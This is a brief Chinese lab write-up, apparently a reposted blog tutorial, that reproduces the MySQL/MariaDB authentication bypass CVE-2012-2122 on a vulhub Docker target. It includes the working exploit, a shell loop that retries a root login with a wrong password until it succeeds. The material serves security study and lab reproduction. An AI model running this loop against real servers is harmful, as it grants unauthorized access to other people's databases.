赞
踩
攻击机主机名:Mortor
靶机主机名:kali
漏洞介绍:当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。 也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。
实验步骤
在靶机搭建环境并启动容器
漏洞环境使用vulhub搭建,漏洞目录为vulhub/mysql/CVE-2012-2122
拉取镜像启动容器:docker-compose up -d
查看端口
环境启动后,将启动一个Mysql服务(版本:5.5.23),监听3306端口,可以在攻击机直接采用shell脚本进行攻击连接数据库
可以先进行正常连接看看是否成功: mysql -h IP -uroot -p123456
IP为存在此漏洞的kali的IP,即靶机
利用Shell脚本复现
在攻击机利用shell脚本通过循环对靶机发起连接请求:
for i in `seq 1 1000`; do mysql -uroot -pwrong -h <Ip> -P3306 ; done
可以看到在经过多次尝试后成功连接数据库,即复现成功
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。